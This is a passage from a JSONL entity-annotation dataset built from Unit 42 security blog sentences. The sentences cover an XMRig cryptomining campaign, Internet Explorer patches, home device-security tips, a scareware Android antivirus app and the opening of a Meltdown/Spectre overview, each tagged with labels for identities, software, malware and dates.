address!","entities":[{"id":48086,"label":"identity","start_offset":1,"end_offset":19},{"id":48087,"label":"identity","start_offset":253,"end_offset":262},{"id":48088,"label":"TIME","start_offset":275,"end_offset":286}],"relations":[],"Comments":[]} -{"id":2915,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2916,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2917,"text":"In October 2017, Palo Alto Networks Unit 42 published research showing how attackers were adapting attack techniques to generate cryptocurrency for themselves.","entities":[{"id":48089,"label":"TIME","start_offset":3,"end_offset":15},{"id":48090,"label":"identity","start_offset":17,"end_offset":43}],"relations":[],"Comments":[]} -{"id":2918,"text":"In that research, we also showed how these attacks were very broad and grew very quickly.","entities":[],"relations":[],"Comments":[]} -{"id":2919,"text":" At the time, we said that the sudden, surging value of cryptocurrencies was likely behind the sudden, strong rise of these new attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2920,"text":"We said that if cryptocurrency values continue to remain high, we could expect to see attackers continue to focus on finding ways to carry out attacks to gain cryptocurrency, and that those attacks would continue to adapt proven attack techniques.","entities":[],"relations":[],"Comments":[]} -{"id":2921,"text":" Unit 42 has just released new research showing that attackers are indeed continuing to adapt existing techniques to generate cryptocurrency.","entities":[{"id":48091,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":2922,"text":" In our research posting “Large Scale Monero Cryptocurrency Mining Operation using XMRig” we detail a new malware campaign that is global in scale, very large in the likely number of victims and uses well established techniques to mine the Monero cryptocurrency.","entities":[{"id":48092,"label":"SOFTWARE","start_offset":38,"end_offset":44},{"id":48094,"label":"SOFTWARE","start_offset":240,"end_offset":246},{"id":48093,"label":"tools","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} -{"id":2923,"text":" Monero is a cryptocurrency similar to bitcoin but notable for its increased emphasis on providing a higher level of privacy around its transactions.","entities":[{"id":48095,"label":"SOFTWARE","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2924,"text":"Like bitcoin, Monero is generated through “mining” a computationally intensive process that provides cryptocurrency credit in exchange for computing resources provided in service to the cryptocurrency and its transaction infrastructure.","entities":[{"id":48096,"label":"SOFTWARE","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} -{"id":2925,"text":" The operation that Unit 42 has recently uncovered works to deliver XMRig, software that is used to mine the Monero cryptocurrency, to victims’ systems without their knowledge or consent.","entities":[{"id":45744,"label":"identity","start_offset":20,"end_offset":27},{"id":45745,"label":"tools","start_offset":68,"end_offset":73},{"id":45746,"label":"SOFTWARE","start_offset":109,"end_offset":115}],"relations":[],"Comments":[]} -{"id":2926,"text":"While XMRig isn’t itself specifically malware, it’s being delivered using malware-delivery techniques without the user’s knowledge and consent just like malware.","entities":[{"id":48097,"label":"tools","start_offset":6,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2927,"text":"The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs.","entities":[{"id":48098,"label":"tools","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} -{"id":2928,"text":"This is a method attackers have used for years to deliver malware and they are using it now to get coinmining software on to people’s systems illicitly.","entities":[],"relations":[],"Comments":[]} -{"id":2929,"text":" The attackers’ use of URL shortners enables our Unit 42 researchers to get an idea of the size, scope, and scale of this operation.","entities":[{"id":48099,"label":"identity","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} -{"id":2930,"text":"And these are all notable and sobering.","entities":[],"relations":[],"Comments":[]} -{"id":2931,"text":" First, this is a young campaign.","entities":[],"relations":[],"Comments":[]} -{"id":2932,"text":"Our research shows this operation to be only about four months old.","entities":[],"relations":[],"Comments":[]} -{"id":2933,"text":" Second, this is a very large campaign.","entities":[],"relations":[],"Comments":[]} -{"id":2934,"text":"Our researchers can show that about one-half of the samples we found have affected 15 million people worldwide.","entities":[],"relations":[],"Comments":[]} -{"id":2935,"text":"While we can’t see how many people the other half of the samples affect, it’s a reasonable supposition that the other half of the total samples affect just as many people as the half we can see.","entities":[],"relations":[],"Comments":[]} -{"id":2936,"text":"This would mean that this operation may affect about 30 million people worldwide.","entities":[],"relations":[],"Comments":[]} -{"id":2937,"text":" In terms of who’s been affected by this operation, again, we can only see half of those who have been affected.","entities":[],"relations":[],"Comments":[]} -{"id":2938,"text":"But what we do see shows that this is a truly global operation.","entities":[],"relations":[],"Comments":[]} -{"id":2939,"text":"This operation affected countries around the globe, but it appears that southeast Asia, northern Africa, and countries in South America were hit the most as shown below. Malicious downloads by country The specific breakout of countries affected, and their download counts are as follows: Taking all those points together, this is operation is very large and clearly very effective.","entities":[{"id":48103,"label":"attack-pattern","start_offset":171,"end_offset":190},{"id":48100,"label":"location","start_offset":72,"end_offset":86},{"id":48101,"label":"location","start_offset":88,"end_offset":103},{"id":48102,"label":"location","start_offset":122,"end_offset":135}],"relations":[],"Comments":[]} -{"id":2940,"text":"It shows how attackers are aggressively focusing their operations and campaigns on generating and acquiring cryptocurrency.","entities":[],"relations":[],"Comments":[]} -{"id":2941,"text":" From a threat point of view, there are two things that are notable.","entities":[],"relations":[],"Comments":[]} -{"id":2942,"text":" First is the fact that from an attack technique point of view, there is nothing new here.","entities":[],"relations":[],"Comments":[]} -{"id":2943,"text":"The tactics and techniques are not new or sophisticated.","entities":[],"relations":[],"Comments":[]} -{"id":2944,"text":" Second is the fact that this operation is clearly very successful based on its size, scope, and age.","entities":[],"relations":[],"Comments":[]} -{"id":2945,"text":" Looking at this latest operation on the continuum of evolving cryptocurrency-focused threats, it’s clear that this is an early-stage threat given its lack of sophistication and reuse of established techniques and tactics.","entities":[],"relations":[],"Comments":[]} -{"id":2946,"text":"But given how quickly and broadly successful it is, combined with the continued high value of cryptocurrencies, we can also conclude that attackers will continue to focus on cryptocurrency and likely will evolve their techniques and tactics quickly.","entities":[],"relations":[],"Comments":[]} -{"id":2947,"text":"Cryptocurrency-focused threats is a key area that all defenders should focus their intelligence and prevention efforts around in 2018.","entities":[],"relations":[],"Comments":[]} -{"id":2948,"text":" Meanwhile, see our full research blog for full details on how attackers are distributing and using XMRig to generate Monero. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":48104,"label":"tools","start_offset":100,"end_offset":105}],"relations":[],"Comments":[]} -{"id":2949,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2950,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2951,"text":"Today, Microsoft patched 59 Internet Explorer vulnerabilities, 21 of them discovered by Palo Alto Networks researchers.","entities":[{"id":48106,"label":"identity","start_offset":88,"end_offset":106},{"id":48105,"label":"identity","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} -{"id":2952,"text":"Palo Alto Networks is committed not only to detecting attacks, but preventing them as well.","entities":[{"id":48107,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":2953,"text":" Our internal research team discovered each of these 21 vulnerabilities and reported them to Microsoft so they could begin building and testing patches.","entities":[{"id":48108,"label":"identity","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} -{"id":2954,"text":"Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35.","entities":[{"id":48109,"label":"identity","start_offset":0,"end_offset":9},{"id":48110,"label":"SOFTWARE","start_offset":57,"end_offset":59},{"id":48111,"label":"TIME","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2955,"text":"We want to acknowledge Palo Alto Networks researchers Bo Qu, Hui Gao, Royce Lu, Xin Ouyang and the entire IPS team for all of the hard work they’ve put into discovering and validating these vulnerabilities.","entities":[{"id":45750,"label":"identity","start_offset":61,"end_offset":68},{"id":45751,"label":"identity","start_offset":70,"end_offset":78},{"id":45752,"label":"identity","start_offset":80,"end_offset":90},{"id":45753,"label":"identity","start_offset":106,"end_offset":114},{"id":45749,"label":"identity","start_offset":54,"end_offset":59},{"id":45748,"label":"identity","start_offset":23,"end_offset":41}],"relations":[],"Comments":[]} -{"id":2956,"text":" The table below provides a summary of the vulnerabilities and which versions of Internet Explorer they impact.","entities":[{"id":48112,"label":"SOFTWARE","start_offset":81,"end_offset":98}],"relations":[],"Comments":[]} -{"id":2957,"text":" Internet Explorer is used in many of the networks Palo Alto Networks protects around the world and we’re doing our part to make it as secure as possible.","entities":[{"id":48114,"label":"SOFTWARE","start_offset":1,"end_offset":18},{"id":48113,"label":"identity","start_offset":51,"end_offset":69}],"relations":[],"Comments":[]} -{"id":2958,"text":"Last week we released a series of IPS signatures to detect an advanced exploitation technique that takes advantage of ActiveX. In May, we linked a recent IE 0-day (CVE-2014-1776) to exploit code used against two other IE vulnerabilities exploited in the last 12 months.","entities":[{"id":45754,"label":"vulnerability","start_offset":164,"end_offset":177},{"id":45755,"label":"SOFTWARE","start_offset":154,"end_offset":156},{"id":45756,"label":"SOFTWARE","start_offset":218,"end_offset":220}],"relations":[],"Comments":[]} -{"id":2959,"text":" Microsoft patched 129 IE vulnerabilities in all of 2013 and today’s release brings the 2014 total to 116.","entities":[{"id":48115,"label":"identity","start_offset":1,"end_offset":10},{"id":48116,"label":"SOFTWARE","start_offset":23,"end_offset":25},{"id":48117,"label":"TIME","start_offset":52,"end_offset":56},{"id":48118,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} -{"id":2960,"text":"The faster the good guys track these down and get them patched, the harder we make the lives of the criminals looking to exploit them.","entities":[],"relations":[],"Comments":[]} -{"id":2961,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2962,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2963,"text":"This time every year, people all over the world get new devices.","entities":[],"relations":[],"Comments":[]} -{"id":2964,"text":"Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.","entities":[],"relations":[],"Comments":[]} -{"id":2965,"text":" Nothing spoils a new gadget more than having some kind of security or privacy problem related to it.","entities":[],"relations":[],"Comments":[]} -{"id":2966,"text":"After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.","entities":[],"relations":[],"Comments":[]} -{"id":2967,"text":" To that end, we’re providing some very basic, but critical steps that you, your family, your loved ones, and friends can take to ensure some basic security and privacy for new devices quickly and easily that can help you be safer and not spoil your unboxing fun. In the vein of the holiday spirit, we’re providing a list of twelve short, simple recommendations that can help you have a happy, safe, and private holiday season.","entities":[],"relations":[],"Comments":[]} -{"id":2968,"text":" 1. Use a Password Manager:","entities":[],"relations":[],"Comments":[]} -{"id":2969,"text":"Even though not all devices can use password managers directly, it’s still one of the best things you can set up.","entities":[],"relations":[],"Comments":[]} -{"id":2970,"text":"PCs and Macs as well as smartphones and tablets increasingly support the use of password managers directly.","entities":[],"relations":[],"Comments":[]} -{"id":2971,"text":"But even for devices that don’t, you can and should use a password manager to generate and store strong passwords for use on all devices in its vault.","entities":[],"relations":[],"Comments":[]} -{"id":2972,"text":"Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi:","entities":[],"relations":[],"Comments":[]} -{"id":2973,"text":"In a home of computers, phones, tablets and IoT devices, nearly always the common point is the home router and Wi-Fi.","entities":[],"relations":[],"Comments":[]} -{"id":2974,"text":"For most, it’s something they set up once and forget about.","entities":[],"relations":[],"Comments":[]} -{"id":2975,"text":"But if you want to keep your home devices more secure, you need to make sure the underlying router and Wi-Fi are more secure.","entities":[],"relations":[],"Comments":[]} -{"id":2976,"text":"Take time to ensure you have a good, complex, unguessable password.","entities":[],"relations":[],"Comments":[]} -{"id":2977,"text":"This is where a password manager can help.","entities":[],"relations":[],"Comments":[]} -{"id":2978,"text":"You may consider configuring it to not broadcast the SSID as well: that can make adding devices a little harder, but that means it’s even harder for people to try and join your home network. 3. Set up More Secure Accounts on Your PCs and Macs: PCs and Macs (both desktop and laptop) are still around and as important as ever in the home.","entities":[],"relations":[],"Comments":[]} -{"id":2979,"text":"Take time to set up an account for everyone with their own username and password.","entities":[],"relations":[],"Comments":[]} -{"id":2980,"text":"Also, all modern operating systems allow you to make accounts “regular user” accounts rather than admin accounts.","entities":[],"relations":[],"Comments":[]} -{"id":2981,"text":"Set everyone up as a “regular user” and set up a separate administrative account to use for maintenance.","entities":[],"relations":[],"Comments":[]} -{"id":2982,"text":"If you have kids, avoid the temptation to let them all use one account or accounts without passwords: this is a chance for them to start to learn the right way to handle passwords by giving them their own and teaching them to never share that password.","entities":[],"relations":[],"Comments":[]} -{"id":2983,"text":"You can generate the password for them and retain it as the “administrator” if you want for monitoring.","entities":[],"relations":[],"Comments":[]} -{"id":2984,"text":"This also is an important lesson for kids to understand that privacy on computers isn’t absolute: the admin can always look at what they’re doing.","entities":[],"relations":[],"Comments":[]} -{"id":2985,"text":" 4. Prevent Lost Tablets and Smartphones from Turning into Something Worse: Portable devices means an increased risk of loss or theft.","entities":[],"relations":[],"Comments":[]} -{"id":2986,"text":"These days, our portable devices often have greater access to more sensitive information than our PCs and Macs do – in the form of mobile banking apps, wallet apps and stored credit cards.","entities":[],"relations":[],"Comments":[]} -{"id":2987,"text":"All modern tablets and smartphones have settings you should enable before you take these portable devices out of your home: a. Passcodes to lock the device.","entities":[],"relations":[],"Comments":[]} -{"id":2988,"text":"b. Encryption of information on the device.","entities":[],"relations":[],"Comments":[]} -{"id":2989,"text":"c. Lost device location.","entities":[],"relations":[],"Comments":[]} -{"id":2990,"text":"d. Deleting or “wiping” data if too many bad passcodes are tried or if you active it remotely.","entities":[],"relations":[],"Comments":[]} -{"id":2991,"text":" 5. Protect your Data on Smartwatches and Personal Fitness Devices: Smartwatches and personal fitness devices are similar to smartphones and tablets and have some of the same features.","entities":[],"relations":[],"Comments":[]} -{"id":2992,"text":"In addition to using those features, you should take time to ensure you know what health information is being used and that the cloud account(s) these devices synchronize with have very strong passwords.","entities":[],"relations":[],"Comments":[]} -{"id":2993,"text":"These devices gather some of your most personal information.","entities":[],"relations":[],"Comments":[]} -{"id":2994,"text":"In some cases, the most serious risk isn’t around the device but the data being stored in the cloud.","entities":[],"relations":[],"Comments":[]} -{"id":2995,"text":" 6. Be Smart with Your Smart Home: Smart home is an umbrella term for a diverse set of devices that have one thing in common: they all feature some kind of internet connectivity.","entities":[],"relations":[],"Comments":[]} -{"id":2996,"text":"Each and every device will have its own security and privacy settings and it pays to take time to understand those BEFORE you put these to work in your home.","entities":[],"relations":[],"Comments":[]} -{"id":2997,"text":"Across the board, though, making sure your home router and Wi-Fi have good security and that you’re using good, strong unique passwords when paring devices with apps (where possible) are easy things you can do for all these devices.","entities":[],"relations":[],"Comments":[]} -{"id":2998,"text":" 7. Don’t Forget About Home Entertainment Apps, TVs and DVRs:","entities":[],"relations":[],"Comments":[]} -{"id":2999,"text":"When we think about home entertainment, there’s really two things you need to think about with security.","entities":[],"relations":[],"Comments":[]} -{"id":3000,"text":"First is the security of the devices themselves.","entities":[],"relations":[],"Comments":[]} -{"id":3001,"text":"In nearly all cases, good security around home routers and Wi-Fi will be the best thing you can do for the devices.","entities":[],"relations":[],"Comments":[]} -{"id":3002,"text":"But home entertainment isn’t just the physical devices.","entities":[],"relations":[],"Comments":[]} -{"id":3003,"text":"It’s the apps you use to view content.","entities":[],"relations":[],"Comments":[]} -{"id":3004,"text":"All apps like those from Netflix, Amazon, Hulu and others have their own passwords to connect to their service, and attackers crack and sell compromised accounts to these services.","entities":[{"id":48120,"label":"SOFTWARE","start_offset":34,"end_offset":40},{"id":48119,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":48121,"label":"SOFTWARE","start_offset":42,"end_offset":46}],"relations":[],"Comments":[]} -{"id":3005,"text":"Because of this, make sure you’re using good, strong unique passwords for the apps you use on these devices.","entities":[],"relations":[],"Comments":[]} -{"id":3006,"text":"This will also protect these apps on your tablets, smartphones, PCs and Macs.","entities":[],"relations":[],"Comments":[]} -{"id":3007,"text":"While You’re at it, Protect Your Gaming Consoles:","entities":[],"relations":[],"Comments":[]} -{"id":3008,"text":"Similar to home entertainment devices, gaming consoles have both the security of the actual device and then the security of the cloud-based accounts to deal with.","entities":[],"relations":[],"Comments":[]} -{"id":3009,"text":"Just like with home entertainment devices, it’s the cloud-based account that attackers are more interested in.","entities":[],"relations":[],"Comments":[]} -{"id":3010,"text":"Here again, taking time to set up good strong passwords is key.","entities":[],"relations":[],"Comments":[]} -{"id":3011,"text":"Also, many gaming platforms now include a second means of authentication (typically a text sent to your phone): you can and should enable that, if at all possible.","entities":[],"relations":[],"Comments":[]} -{"id":3012,"text":" 9. Configure User Profiles for Voice Assistants:","entities":[],"relations":[],"Comments":[]} -{"id":3013,"text":"Voice assistants are some of the newest devices out there, which means they’re the least known and understood.","entities":[],"relations":[],"Comments":[]} -{"id":3014,"text":"The biggest risk that’s been popularly discussed is voice command hijacking by outside sources.","entities":[],"relations":[],"Comments":[]} -{"id":3015,"text":"While a cool news story, it’s not been documented to be a broad risk, especially as devices get better at specific voice recognition.","entities":[],"relations":[],"Comments":[]} -{"id":3016,"text":"For these devices, take time to configure individual user profiles as much as possible.","entities":[],"relations":[],"Comments":[]} -{"id":3017,"text":"And many of these devices feature mute buttons that can functionally turn them off when you don’t need them.","entities":[],"relations":[],"Comments":[]} -{"id":3018,"text":"If you haven’t been using it, consider using that feature.","entities":[],"relations":[],"Comments":[]} -{"id":3019,"text":" 10. Use Smart Speakers Smartly:","entities":[],"relations":[],"Comments":[]} -{"id":3020,"text":"Smart speakers can be thought of as a subset of home assistants in that they are voice-activated devices in your home.","entities":[],"relations":[],"Comments":[]} -{"id":3021,"text":"And many smart speakers have digital home assistants built into them, making the distinction even less clear.","entities":[],"relations":[],"Comments":[]} -{"id":3022,"text":"This means that what you would do for security for your digital home assistant would apply to smart speakers as well.","entities":[],"relations":[],"Comments":[]} -{"id":3023,"text":"However, one thing to consider is if all you really want or need is a smart music device, it may make sense to keep your purchases focused on devices that do only that.","entities":[],"relations":[],"Comments":[]} -{"id":3024,"text":"This can improve your security by reducing the risk posed by features that you don’t want or need.","entities":[],"relations":[],"Comments":[]} -{"id":3025,"text":"11. Drive Safely and Securely with Smart Cars:","entities":[],"relations":[],"Comments":[]} -{"id":3026,"text":"While “car hacking” is something that you see in the news, the reality is that practical smart car security is more common than headlines may lead you to believe.","entities":[],"relations":[],"Comments":[]} -{"id":3027,"text":"A key differentiating feature with smart cars is they often have “smart” lock and ignition systems that are tied to fobs and\/or your devices (like a smartphone).","entities":[],"relations":[],"Comments":[]} -{"id":3028,"text":"Good smart car security in this case means building on the good security around devices and good physical security.","entities":[],"relations":[],"Comments":[]} -{"id":3029,"text":"Ensure that any connected smart devices have good security, especially to protect against loss or theft.","entities":[],"relations":[],"Comments":[]} -{"id":3030,"text":"Make sure you only give fobs to people that you trust.","entities":[],"relations":[],"Comments":[]} -{"id":3031,"text":"And ensure that any cloud-connected accounts have good passwords and use a second authentication method, if possible.","entities":[],"relations":[],"Comments":[]} -{"id":3032,"text":" 12. Patch, Patch and Patch Some More:","entities":[],"relations":[],"Comments":[]} -{"id":3033,"text":"We close this list with patching because it is the most important thing you can do.","entities":[],"relations":[],"Comments":[]} -{"id":3034,"text":"Few people like getting into the guts of devices to manage updates and the apps on them but the reality right now is that this is not only critical for security and privacy, it’s also sometimes a process that can only be done manually.","entities":[],"relations":[],"Comments":[]} -{"id":3035,"text":"For every kind of device or system, you should think about and understand how you can do updates for: a.","entities":[],"relations":[],"Comments":[]} -{"id":3036,"text":"The “firmware”: this is the software that is on the physical device itself, like the actual router, the actual car or the actual DVR.","entities":[],"relations":[],"Comments":[]} -{"id":3037,"text":"b. The operating system on the device: Some devices don’t have an operating system separate from the firmware, but many do.","entities":[],"relations":[],"Comments":[]} -{"id":3038,"text":"PCs and Macs have firmware and an operating system (Windows, macOS and Linux).","entities":[{"id":48122,"label":"SOFTWARE","start_offset":52,"end_offset":59},{"id":48123,"label":"SOFTWARE","start_offset":61,"end_offset":67},{"id":48124,"label":"SOFTWARE","start_offset":71,"end_offset":76}],"relations":[],"Comments":[]} -{"id":3039,"text":"c. The apps and applications on the computer or device: Like we noted about home entertainment and gaming consoles, sometimes it’s the apps rather than the device itself that is important.","entities":[],"relations":[],"Comments":[]} -{"id":3040,"text":"Many apps these days have auto-update capabilities.","entities":[],"relations":[],"Comments":[]} -{"id":3041,"text":"But some don’t, so it’s important to make sure you know how apps get their updates.","entities":[],"relations":[],"Comments":[]} -{"id":3042,"text":" If you take some time to understand these basic ideas and take these basic steps, you can ensure that you’ve got a good start on using new devices more safely and with better privacy during the holiday season. Of course, this isn’t an exhaustive list.","entities":[],"relations":[],"Comments":[]} -{"id":3043,"text":"And it’s always good to know about other features and capabilities, for example child safety controls.","entities":[],"relations":[],"Comments":[]} -{"id":3044,"text":"But the start of a journey of a thousand miles begins with one step, and the start of a journey of a thousand days of using these new devices safely can start with these simple steps.","entities":[],"relations":[],"Comments":[]} -{"id":3045,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":3046,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":3047,"text":"We have recently been investigating an antivirus app in the Google Play store that was displaying fake virus detection results to scare users into purchasing a premium service.","entities":[{"id":48125,"label":"SOFTWARE","start_offset":60,"end_offset":71}],"relations":[],"Comments":[]} -{"id":3048,"text":"According to the Google Play store statistics, users have downloaded “AntiVirus for Android™” more than one million times and the app was listed in Top 100 free apps in Tools category.","entities":[{"id":45757,"label":"SOFTWARE","start_offset":17,"end_offset":29},{"id":45758,"label":"malware","start_offset":70,"end_offset":92}],"relations":[],"Comments":[]} -{"id":3049,"text":"Our Wildfire analysis cloud captured the initial app and identified it as Scareware.","entities":[{"id":48126,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} -{"id":3050,"text":" On January 20, we reported this issue to Google and two days later, they removed the app from Google Play.","entities":[{"id":48128,"label":"identity","start_offset":42,"end_offset":48},{"id":48127,"label":"TIME","start_offset":4,"end_offset":14},{"id":48129,"label":"SOFTWARE","start_offset":95,"end_offset":106}],"relations":[],"Comments":[]} -{"id":3051,"text":" “AntiVirus for Android™” was developed by a company named “CTG Network Ltd.","entities":[{"id":45759,"label":"malware","start_offset":3,"end_offset":24},{"id":45760,"label":"identity","start_offset":61,"end_offset":77}],"relations":[],"Comments":[]} -{"id":3052,"text":"”(Figure 1)","entities":[],"relations":[],"Comments":[]} -{"id":3053,"text":"According the (now removed) Google Play listing, the app was downloaded and installed between 1 million and 5 millions times.","entities":[{"id":48130,"label":"SOFTWARE","start_offset":28,"end_offset":39}],"relations":[],"Comments":[]} -{"id":3054,"text":"Before the removal it had also received 5,162 recommendations and 16,531 reviews that resulted in an average score of 4.0.","entities":[],"relations":[],"Comments":[]} -{"id":3055,"text":"According to AppBrain, the app was also listed in top 30 of Top Grossing Apps in Tools category in United States, Japan, France and South Korea.","entities":[{"id":48132,"label":"location","start_offset":99,"end_offset":112},{"id":48131,"label":"identity","start_offset":13,"end_offset":21},{"id":48133,"label":"location","start_offset":114,"end_offset":119},{"id":48134,"label":"location","start_offset":121,"end_offset":127},{"id":48135,"label":"location","start_offset":132,"end_offset":143}],"relations":[],"Comments":[]} -{"id":3056,"text":" Figure 1 AntiVirus for Android™ in the Google Play Store ","entities":[{"id":48136,"label":"malware","start_offset":10,"end_offset":32},{"id":48137,"label":"SOFTWARE","start_offset":40,"end_offset":57}],"relations":[],"Comments":[]} -{"id":3057,"text":"When a user opens the app, it will always report that it has located two or three threats on the device (Figure 2), including the following: Figure 2","entities":[],"relations":[],"Comments":[]} -{"id":3058,"text":"The App Indicates Two Threats were Found If the user clicks the “Repair” button, the apps will indicate that one of the threats was eliminated and advise the user to upgrade to its full version to remove the remaining threat(s).","entities":[],"relations":[],"Comments":[]} -{"id":3059,"text":"If the user clicks the “Update to Full Protection” button they will be prompted to subscribe to a service that costs $4.99 (US) per month through In-App Purchase of Google Play (Figure 3). Figure 3","entities":[],"relations":[],"Comments":[]} -{"id":3060,"text":"The app requests that the user pay 4.99$ per month for full protection.","entities":[],"relations":[],"Comments":[]} -{"id":3061,"text":"Through analyzing the app’s code we discovered a multiple indications that this program was not a legitimate Antivirus program, but actually Scareware.","entities":[],"relations":[],"Comments":[]} -{"id":3062,"text":"First, the initial “threats detection results” are hard-coded in the app (Figure 4), which means the app wasn't actually detecting them on the phone.","entities":[],"relations":[],"Comments":[]} -{"id":3063,"text":"The developer even directly named these “infected packages” as “fake.virus” in the source code.","entities":[{"id":48138,"label":"FILEPATH","start_offset":64,"end_offset":74}],"relations":[],"Comments":[]} -{"id":3064,"text":" Figure 4 Hard-coded fake threat detection results ","entities":[],"relations":[],"Comments":[]} -{"id":3065,"text":"Since the detection result is fake, the subsequent cleaning is not real either – the elimination operation is just marking a flag of \"initial_virus_cleared\" to “1” in the app’s internal database.","entities":[],"relations":[],"Comments":[]} -{"id":3066,"text":"The code in Figure 5 shows that the “We have eliminated 1 of %d Threat(s)” message shown in Figure 3 is also hard coded.","entities":[],"relations":[],"Comments":[]} -{"id":3067,"text":"Figure 5 Code that generated the fake threat cleared page.","entities":[],"relations":[],"Comments":[]} -{"id":3068,"text":" One interesting difference between this program and other Fake AV apps is “AntiVirus for Android™” will actually provide real antivirus services to paid users.","entities":[{"id":48139,"label":"malware","start_offset":76,"end_offset":98}],"relations":[],"Comments":[]} -{"id":3069,"text":"The app integrates a mobile antivirus engine provided by Bitdefender and if users upgrade to the premium version, it will scan apps and the device’s SD card with that engine.","entities":[],"relations":[],"Comments":[]} -{"id":3070,"text":"This is the main reason we classify the program as Scareware rather than just Fake AV.","entities":[],"relations":[],"Comments":[]} -{"id":3071,"text":" It is not clear whether the integrated BitDefender AV engine is actually licensed to the app’s developer.","entities":[{"id":48140,"label":"SOFTWARE","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} -{"id":3072,"text":"The engine retrieves code updated and new signatures updating from hxxp:\/\/ api.androidsantivirus .com \/antivirus\/android-arm, which is hosted on the app’s official website.","entities":[{"id":45761,"label":"URL","start_offset":67,"end_offset":124}],"relations":[],"Comments":[]} -{"id":3073,"text":" Figure 6 The App Integrates the BitDefender AV Engine for Premium Users ","entities":[{"id":9395,"label":"SOFTWARE","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} -{"id":3074,"text":"In March of 2014, a Fake AV app named “Virus Shield” was listed for sale at $3.99 and quickly rose to the top position of Google Play’s New Paid Apps list.","entities":[{"id":48141,"label":"malware","start_offset":39,"end_offset":51},{"id":48142,"label":"SOFTWARE","start_offset":122,"end_offset":134},{"id":48143,"label":"TIME","start_offset":3,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3075,"text":"Virus Shield was downloaded over 30,000 times, fare fewer than this latest piece of Scareware, although we do not know how many users actually paid for the $4.99 monthly service before Google removed the app from the store.","entities":[{"id":45762,"label":"identity","start_offset":185,"end_offset":191},{"id":45763,"label":"malware","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":3076,"text":" The fact that AntiVirus for Android™ contains an actual AV engine makes it more difficult for other programs to identify it as Scareware, as this makes the program appear legitimate.","entities":[{"id":48144,"label":"malware","start_offset":15,"end_offset":37}],"relations":[],"Comments":[]} -{"id":3077,"text":"While Google has already removed this application from the Play store, we’ll keep monitoring the latest Android apps to make sure WildFire is providing the best protection for our customers.","entities":[{"id":48145,"label":"identity","start_offset":6,"end_offset":12},{"id":48147,"label":"SOFTWARE","start_offset":104,"end_offset":111},{"id":48148,"label":"SOFTWARE","start_offset":130,"end_offset":138},{"id":48146,"label":"SOFTWARE","start_offset":59,"end_offset":69}],"relations":[],"Comments":[]} -{"id":3078,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":3079,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":3080,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":3081,"text":"This post is also available in: 日本語 (Japanese) Bottom line","entities":[],"relations":[],"Comments":[]} -{"id":3082,"text":"up front","entities":[],"relations":[],"Comments":[]} -{"id":3083,"text":" Overview ","entities":[],"relations":[],"Comments":[]} -{"id":3084,"text":"In the past 48 hours, there has been a flurry of activity as hardware and software vendors move to address two sets of vulnerabilities that have been dubbed “Meltdown” and “Spectre”.","entities":[{"id":45764,"label":"vulnerability","start_offset":158,"end_offset":166},{"id":45765,"label":"vulnerability","start_offset":173,"end_offset":180},{"id":9420,"label":"TIME","start_offset":3,"end_offset":20}],"relations":[],"Comments":[]} -{"id":3085,"text":" This blog is meant to give an overview of the situation, the vulnerabilities, assist Palo Alto Networks customers and others with their risk assessment, and provide recommendations for actions they can take to prevent successful attacks against these vulnerabilities.","entities":[{"id":48149,"label":"identity","start_offset":86,"end_offset":104}],"relations":[],"Comments":[]} -{"id":3086,"text":" Situation ","entities":[],"relations":[],"Comments":[]} -{"id":3087,"text":"On January 3, 2018, researchers, including those with Google Project Zero, released information on three new vulnerabilities:","entities":[{"id":48150,"label":"TIME","start_offset":3,"end_offset":18},{"id":45766,"label":"identity","start_offset":54,"end_offset":73}],"relations":[],"Comments":[]} -{"id":3088,"text":" They grouped these vulnerabilities under the names “Spectre” (CVE-2017-5753 and CVE-2017-5715) 